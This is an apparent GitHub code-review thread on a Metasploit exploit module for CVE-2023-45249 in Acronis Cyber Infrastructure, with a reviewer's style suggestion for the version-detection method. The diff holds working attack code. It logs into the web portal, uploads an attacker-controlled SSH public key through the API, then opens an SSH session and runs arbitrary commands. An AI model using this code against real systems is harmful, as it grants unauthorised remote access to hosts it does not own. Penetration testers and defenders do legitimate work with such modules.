modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb

```diff
@@ -0,0 +1,328 @@
+    begin
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        self.ssh_socket = Net::SSH.start(ip, user, ssh_opts)
+      end
+    rescue Rex::ConnectionError
+      fail_with(Failure::Unreachable, 'Disconnected during negotiation')
+    rescue Net::SSH::Disconnect, ::EOFError
+      fail_with(Failure::Disconnected, 'Timed out during negotiation')
+    rescue Net::SSH::AuthenticationFailed
+      return false
+    rescue Net::SSH::Exception => e
+      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
+    end
+
+    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
+    return true
+  end
+
+  def aci_login(name, pwd)
+    # Login at the Acronis Cyber Infrastructure web portal
+    post_data = {
+      username: name.to_s,
+      password: pwd.to_s
+    }.to_json
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'login'),
+      'data' => post_data.to_s
+    })
+    return true if res&.code == 200
+
+    false
+  end
+
+  def upload_sshkey(sshkey)
+    # Upload the SSH public key at the Acronis Cyber Infrastructure web portal
+    post_data = {
+      key: sshkey.to_s,
+      event:
+      {
+        name: 'SshKeys',
+        method: 'post',
+        data:
+        {
+          key: sshkey.to_s
+        }
+      }
+    }.to_json
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'uri' => normalize_uri(target_uri.path, 'api', 'v2', '1', 'ssh-keys'),
+      'data' => post_data.to_s
+    })
+    return true if res&.code == 202 && res.body.include?('task_id')
+
+    false
+  end
+
+  def execute_command(cmd, _opts = {})
+    Timeout.timeout(datastore['WfsDelay']) { ssh_socket.exec!(cmd) }
+  rescue Timeout::Error
+    @timeout = true
+  end
+
+  def get_aci_version
+    # Return ACI version-release or nil if not found
+    version_release = nil
+    res = send_request_cgi({
+      'method' => 'GET',
+      'ctype' => 'application/json',
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'about')
+    })
+    if res&.code == 200 && res.body.include?('storage-release')
+      # parse json response and get the version
+      res_json = res.get_json_document
+      unless res_json.blank?
+        version = res_json['storage-release']['version']
+        release = res_json['storage-release']['release']
+        version_release = Rex::Version.new("#{version}-#{release}".gsub(/[[:space:]]/, '')) unless version.nil? || release.nil?
+      end
+      return version_release
+    end
```

Comment:
When reading this method, `version_release` is defined as `nil` at the start of the method, then ignored for a while, then suddenly it's back, but buried inside two conditional branches, and also returned unmodified if the second branch isn't taken.

As this method will only ever return `nil` or `Rex::Version`, suggest:

```suggestion
    res = send_request_cgi({
      'method' => 'GET',
      'ctype' => 'application/json',
      'headers' => {
        'X-Requested-With' => 'XMLHttpRequest'
      },
      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'about')
    })

    return unless res&.code == 200
    return unless res.body.include?('storage-release')

    # parse json response and get the version
    res_json = res.get_json_document
    return if res_json.blank?

    version = res_json['storage-release']['version']
    return if version.nil?

    release = res_json['storage-release']['release']
    return if release.nil?

    Rex::Version.new("#{version}-#{release}".gsub(/[[:space:]]/, ''))
```